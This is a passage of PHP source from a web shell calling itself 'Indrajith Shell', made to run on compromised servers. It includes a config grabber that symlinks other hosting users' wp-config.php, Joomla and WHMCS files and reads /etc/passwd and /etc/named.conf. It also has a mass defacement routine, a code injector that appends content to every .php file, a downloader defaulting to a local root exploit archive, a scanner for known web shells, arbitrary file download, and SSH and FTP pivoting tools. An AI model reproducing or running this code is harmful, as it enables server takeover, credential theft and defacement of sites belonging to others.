  1367. $rtr=array();
  1368. echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1369. $webz=$_POST['rem_web'];
  1370. $uri_in=$_POST['tryzzz'];
  1371. $r_xuri = trim($uri_in);
  1372. $r_xuri=explode("\n", $r_xuri);
  1373. foreach($r_xuri as $rty)
  1374. {
  1375. $urlzzx=$webz.$rty;
  1376. if(function_exists('curl_init'))
  1377. {
  1378. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1379. $ch = curl_init($urlzzx);
  1380. curl_setopt($ch, CURLOPT_NOBODY, true);
  1381. curl_exec($ch);
  1382. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1383. curl_close($ch);
  1384. if($status_code==200)
  1385. {
  1386. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1387. }
  1388. else
  1389. {
  1390. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1391. }
  1392. }
  1393. else
  1394. {
  1395. echo "<font color=red>cURL Not Found </font>";
  1396. break;
  1397. }
  1398. }
  1399. echo "</table><br /><br /><hr /><br /><br /></div>";
  1400. }
  1401. function remote_download_ui()
  1402. {
  1403. echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1404. <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1405. <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1406. }
  1407. function remote_download_bg()
  1408. {
  1409. chdir($_GET['path']);
  1410. global $os;
  1411. $opt=$_GET['type_r_down'];
  1412. $rt_ffile=$_GET['rurlfile'];
  1413. $name=basename($rt_ffile);
  1414. echo "<div id=result>";
  1415. switch($opt)
  1416. {
  1417. case "WGET":
  1418. if($os!='win')
  1419. {
  1420. cmd("wget $rt_ffile");
  1421. alert("Downloaded Successfully...");
  1422. }
  1423. else
  1424. {
  1425. alert("Its Windows OS... WGET is not available");
  1426. }
  1427. break;
  1428. case "cURL":
  1429. if(function_exists('curl_init'))
  1430. {
  1431. $ch = curl_init($rt_ffile);
  1432. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1433. $data = curl_exec($ch);
  1434. curl_close($ch);
  1435. file_put_contents($name, $data);
  1436. alert("Download succeeded");
  1437. }
  1438. else
  1439. {
  1440. alert("cURL Not Available");
  1441. }
  1442. break;
  1443. }
  1444. echo "</div>";
  1445. }
  1446. function hex_encode_ui()
  1447. {
  1448. if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1449. {
  1450. $tyx=$_POST['tyxxx'];
  1451. $rezultzz=$_POST['hexinp'];
  1452. switch($tyx)
  1453. {
  1454. case "Encode":
  1455. $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1456. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1457. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1458. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1459. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1460. break;
  1461. case "Decode":
  1462. $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1463. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1464. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1465. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1466. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1467. break;
  1468. }
  1469. }
  1470. else
  1471. {
  1472. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1473. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1474. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1475. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
  1476. }
  1477. }
  1478. function killme()
  1479. {
  1480. global $self;
  1481. echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1482. $me=basename($self);
  1483. unlink($me);
  1484. }
  1485. function ftp_anonymous_ui()
  1486. {
  1487. echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
  1488. ftp.google.com
  1489. ftp.r00t.com
  1490. ftp.ajithkp.org
  1491. ...
  1492. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1493. }
  1494. function ftp_anonymous_bg()
  1495. {
  1496. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
  1497. $ftp_list=$_GET['ftp_anonz'];
  1498. $xftpl = trim($ftp_list);
  1499. $xftpl = explode("\n", $xftpl);
  1500. foreach($xftpl as $xftp)
  1501. {
  1502. $xftp = str_replace("ftp://", "", $xftp);
  1503. $conn_ftp = ftp_connect($xftp);
  1504. $success = ftp_login($conn_ftp, "anonymous", "");
  1505. if($success)
  1506. {
  1507. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
  1508. }
  1509. else
  1510. {
  1511. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
  1512. }
  1513. }
  1514. echo "</table><br /><br /><hr /><br /><br />";
  1515. }
  1516. function mass_deface_ui()
  1517. {
  1518. echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
  1519. <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1520. }
  1521. function mass_deface_bg()
  1522. {
  1523. global $sep;
  1524. $d_path=$_GET['mm_path'];
  1525. chdir($d_path);
  1526. $d_file=$_GET['mass_name'];
  1527. $d_conten=$_GET['mass_cont'];
  1528. if(is_dir($d_path))
  1529. {
  1530. chdir($d_path);
  1531. $d_dirs=array();
  1532. if($handle=opendir($d_path))
  1533. {
  1534. while(($item=readdir($handle))!==FALSE)
  1535. {
  1536. if($item=="."){continue;}
  1537. if($item==".."){continue;}
  1538. if(is_dir($item))
  1539. {
  1540. array_push($d_dirs, $item);
  1541. }
  1542. }
  1543. }
  1544. }
  1545. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
  1546. foreach($d_dirs as $d_dir)
  1547. {
  1548. $xd_path=getcwd()."$sep$d_dir$sep$d_file";
  1549. if(is_writable($d_dir))
  1550. {
  1551. $handle=fopen($xd_path, "wb");
  1552. if($handle)
  1553. {
  1554. fwrite($handle, $d_conten);
  1555. }
  1556. }
  1557. echo "<tr><td><font color=green>$xd_path</font></td></tr>";
  1558. }
  1559. echo "</table><br /><br /><hr /><br /><br /></div>";
  1560. }
  1561. function symlinkg($usernamexx,$domainxx)
  1562. {
  1563. symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
  1564. symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
  1565. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
  1566. symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
  1567. symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
  1568. symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
  1569. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
  1570. symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
  1571. symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
  1572. symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
  1573. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
  1574. symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
  1575. symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
  1576. symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
  1577. symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
  1578. symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
  1579. symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
  1580. symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
  1581. symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
  1582. symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
  1583. symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
  1584. symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
  1585. symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
  1586. symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
  1587. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
  1588. symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
  1589. symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
  1590. symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
  1591. symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
  1592. symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
  1593. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
  1594. }
  1595. function config_grabber_bg()
  1596. {
  1597. global $sym_htaccess,$sym_php_ini;
  1598. mkdir('INDRAJITH', 0777);
  1599. symlink("/", "INDRAJITH/root");
  1600. $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
  1601. fwrite($htaccess,$sym_htaccess);
  1602. $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
  1603. fwrite($php_ini_x, $sym_php_ini);
  1604. $usr=explode("\n",$_POST['user_z_list']);
  1605. foreach($usr as $uzer)
  1606. {
  1607. $u_er=trim($uzer);
  1608. symlinggg($u_er);
  1609. }
  1610. echo "<script>window.open('INDRAJITH/', '_blank');</script>";
  1611. alert('Config Grab compted. Check configs in direcory INDRAJITH');
  1612. }
  1613. if(isset($_POST['user_z_list']))
  1614. {
  1615. config_grabber_bg();
  1616. }
  1617. function config_grabber_ui()
  1618. {
  1619. if(file('/etc/passwd'))
  1620. {
  1621. ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
  1622. $users = file('/etc/passwd');
  1623. foreach($users as $user)
  1624. {
  1625. $user = explode(':', $user);
  1626. echo $user[0]."\n";
  1627. }
  1628. ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value=' >> '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
  1629. }
  1630. else
  1631. {
  1632. alert(" File Not Found : /etc/passwd ");
  1633. }
  1634. }
  1635. function symlinggg($user)
  1636. {
  1637. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
  1638. symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
  1639. symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
  1640. symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
  1641. symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
  1642. symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
  1643. symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
  1644. symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
  1645. symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
  1646. symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
  1647. symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
  1648. symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
  1649. symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
  1650. symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
  1651. symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
  1652. symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
  1653. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1654. symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
  1655. symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
  1656. symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
  1657. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1658. symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
  1659. symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
  1660. symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
  1661. symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
  1662. symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
  1663. symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
  1664. symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
  1665. }
  1666. function sym_xxx()
  1667. {
  1668. global $sym_htaccess,$sym_php_ini;
  1669. mkdir('Indrajith', 0777);
  1670. symlink("/", "Indrajith/root");
  1671. $htaccess=@fopen('Indrajith/.htaccess', 'w');
  1672. fwrite($htaccess,$sym_htaccess);
  1673. $php_ini_x=fopen('Indrajith/php.ini', 'w');
  1674. fwrite($php_ini_x, $sym_php_ini);
  1675. $akps = implode(file("/etc/named.conf"));
  1676. if(!$akps)
  1677. {
  1678. config_grabber_ui();
  1679. }
  1680. else
  1681. {
  1682. $usrd = array();
  1683. foreach($akps as $akp)
  1684. {
  1685. if(eregi("zone", $akp))
  1686. {
  1687. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1688. flush();
  1689. if(strlen(trim($akpzz[1][0]))>2)
  1690. {
  1691. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1692. symlinkg($akpzz[1][0],$user['name']);
  1693. flush();
  1694. }
  1695. }
  1696. }
  1697. }
  1698. }
  1699. function sym_link()
  1700. {
  1701. global $sym_htaccess,$sym_php_ini;
  1702. cmd('rm -rf AKP');
  1703. mkdir('AKP', 0755);
  1704. $usrd = array();
  1705. $akps = implode(file("/etc/named.conf"));
  1706. $htaccess=fopen('AKP/.htaccess', 'w');
  1707. fwrite($htaccess,$sym_htaccess);
  1708. $php_ini_x=fopen('AKP/php.ini', 'w');
  1709. fwrite($php_ini_x, $sym_php_ini);
  1710. symlink("/", "AKP/root");
  1711. if(!$file)
  1712. {
  1713. echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
  1714. echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  1715. $users = file('/etc/passwd');
  1716. foreach($users as $user)
  1717. {
  1718. $user = explode(':', $user);
  1719. echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
  1720. }
  1721. echo "</table><br /><br /><hr /><br /><br /></div>";
  1722. }
  1723. else
  1724. {
  1725. echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1726. foreach($akps as $akp)
  1727. {
  1728. if(eregi("zone", $akp))
  1729. {
  1730. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1731. flush();
  1732. if(strlen(trim($akpzz[1][0]))>2)
  1733. {
  1734. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1735. echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
  1736. flush();
  1737. }
  1738. }
  1739. }
  1740. }
  1741. }
  1742. function shell_finder_ui()
  1743. {
  1744. echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value=' >> ' /></form><br /><br /><hr /><br /><br />";
  1745. }
  1746. function shell_finder_bg()
  1747. {
  1748. $sh_url=$_GET['sh311_scanx'];
  1749. echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
  1750. $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
  1751. foreach($ShellZ as $shell)
  1752. {
  1753. $urlzzx=$sh_url.$shell;
  1754. if(function_exists('curl_init'))
  1755. {
  1756. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1757. $ch = curl_init($urlzzx);
  1758. curl_setopt($ch, CURLOPT_NOBODY, true);
  1759. curl_exec($ch);
  1760. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1761. curl_close($ch);
  1762. if($status_code==200)
  1763. {
  1764. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1765. }
  1766. else
  1767. {
  1768. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1769. }
  1770. }
  1771. else
  1772. {
  1773. echo "<font color=red>cURL Not Found </font>";
  1774. break;
  1775. }
  1776. }
  1777. echo "</table><br /><br /><hr /><br /><br /></div>";
  1778. }
  1779. function code_in_ui()
  1780. {
  1781. global $sep;
  1782. $mode=$_POST['modexxx'];
  1783. $ftype=$_POST['ffttype'];
  1784. $c_cont=$_POST['code_cont'];
  1785. $ppp=$_POST['path'];
  1786. if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
  1787. {
  1788. echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
  1789. switch($mode)
  1790. {
  1791. case "Apender":
  1792. $mmode="a";
  1793. break;
  1794. case "Rewrite":
  1795. $mmode="w";
  1796. break;
  1797. }
  1798. if($handle = opendir($ppp))
  1799. {
  1800. while(($c_file = readdir($handle)) !== False)
  1801. {
  1802. if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
  1803. {
  1804. echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
  1805. $fd = fopen($ppp.$sep.$c_file,$mmode);
  1806. if($fd)
  1807. {
  1808. fwrite($fd,$c_cont);
  1809. }
  1810. else
  1811. {
  1812. alert("Error. Access Denied");
  1813. }
  1814. }
  1815. }
  1816. }
  1817. echo "</table><br /><br /><hr /><br /><br /></div>";
  1818. }
  1819. else
  1820. {
  1821. ?>
  1822. <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
  1823. <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
  1824. <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value=' >> ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
  1825. <?php
  1826. }
  1827. }
  1828. if(isset($_GET['down']))
  1829. {
  1830. ob_clean();
  1831. $filcont=file_get_contents($_GET['down']);
  1832. header('Content-Description: File Transfer');
  1833. header("Content-type: application/octet-stream");
  1834. header("Content-length: ".strlen($filcont));
  1835. header("Content-disposition: attachment; filename=".basename($_GET['down']).";");
  1836. flush();
  1837. echo $filcont;
  1838. exit;
  1839. }
  1840. if(isset($_GET['gzip']))
  1841. {
  1842. ob_clean();
  1843. $filcont=gzencode(file_get_contents($_GET['down']), 9);
  1844. header('Content-Description: File Transfer');
  1845. header("Content-Type:application/x-gzip;");
  1846. header("Content-length:".strlen($filcont).";");
  1847. header("Content-disposition: attachment; filename=".basename($_GET['gzip']).".gz;");
  1848. flush();
  1849. echo $filcont;
  1850. exit;
  1851. }
  1852. function ssh_man_ui()
  1853. {
  1854. ?>
  1855. <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1856. <?php
  1857. }
  1858. function ssh_man_bg()
  1859. {
  1860. $ssh_h=$_GET['ssh_host'];
  1861. $ssh_u=$_GET['ssh_user'];
  1862. $ssh_p=$_GET['ssh_pass'];
  1863. if(!function_exists('ssh2_connect'))
  1864. {
  1865. alert("Sorry, Function ssh2_connect is not found");
  1866. }
  1867. $conn=ssh2_connect($ssh_h, 22);
  1868. if(!$conn)
  1869. {
  1870. alert("SSH Host Not Found");
  1871. }
  1872. $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
  1873. if(!$log)
  1874. {
  1875. alert("SSH Authorication failed");
  1876. }
  1877. $shell=ssh2_shell($conn, "bash");
  1878. if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
  1879. {
  1880. $ssh_cmd=$_GET['ssh_cmd'];
  1881. fwrite($shell, $ssh_cmd);
  1882. sleep(1);
  1883. while($line=fgets($shell))
  1884. {
  1885. flush();
  1886. echo $line."\n";
  1887. }
  1888. ?>
  1889. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1890. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
  1891. <?php
  1892. }
  1893. else
  1894. {
  1895. ?>
  1896. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1897. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
  1898. <?php
  1899. }
  1900. }
  1901. function ftp_man_ui()
  1902. {
  1903. ?>
  1904. <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
  1905. <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
  1906. <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
  1907. <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
  1908. <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
  1909. <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
  1910. <tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1911. <?php
  1912. }
  1913. function ftp_man_bg()
  1914. {
  1915. echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
  1916. $fhost=$_GET['ftp_host'];
  1917. $fuser=$_GET['ftp_user'];
  1918. $fpass=$_GET['ftp_pass'];
  1919. $fpath=$_GET['fpath'];
  1920. $upl=$_GET['upload_file'];
  1921. $down=$_GET['download_file'];
  1922. if($fpath=="")
  1923. {
  1924. $fpath=ftp_pwd($conn);
  1925. }
  1926. $conn=ftp_connect($fhost);
  1927. if(!$conn)
  1928. {
  1929. alert("FTP Host Not Found!!!");
  1930. }
  1931. if($fuser=="")
  1932. {
  1933. $fuser="anonymous";
  1934. }
  1935. $log=ftp_login($conn, $fuser, $fpass);
  1936. if(!$log)
  1937. {
  1938. alert("FTP Authorication Failed");
  1939. }
  1940. if($upl!="")
  1941. {
  1942. $fp = fopen($upl, 'r');
  1943. if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
  1944. {
  1945. echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
  1946. }
  1947. else
  1948. {
  1949. echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
  1950. }
  1951. }
  1952. if($down!="")
  1953. {
  1954. $handle = fopen($down, 'w');
  1955. if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
  1956. {
  1957. echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
  1958. }
  1959. else
  1960. {
  1961. echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
  1962. }
  1963. }
  1964. echo "<table class='table'><tr><th>Files</th>";
  1965. ftp_chdir($fpath);
  1966. $list=ftp_rawlist($conn, $fpath);
  1967. foreach($list as $fff)
  1968. {
  1969. echo "<tr><td><pre>$fff</pre></td></tr>";
  1970. }
  1971. echo "</table></div>";
  1972. }
  1973. //////////////////////////////// Frond End Calls ///////////////////////////////
  1974. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  1975. {
  1976. edit_file_bg();
  1977. }
  1978. else if(isset($_REQUEST['sh311_scanner']))
  1979. {
  1980. shell_finder_ui();
  1981. }
  1982. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
  1983. {
  1984. ftp_man_bg();
  1985. }
  1986. else if(isset($_REQUEST['ftpman']))
  1987. {
  1988. ftp_man_ui();
  1989. }
  1990. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
  1991. {
  1992. ssh_man_bg();
  1993. }
  1994. else if(isset($_REQUEST['sshman']))
  1995. {
  1996. ssh_man_ui();
  1997. }
  1998. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
  1999. {
  2000. chdir($_GET['path']);
  2001. code_in_ui();
  2002. }
  2003. else if(isset($_GET['sh311_scanx']))
  2004. {
  2005. shell_finder_bg();
  2006. }
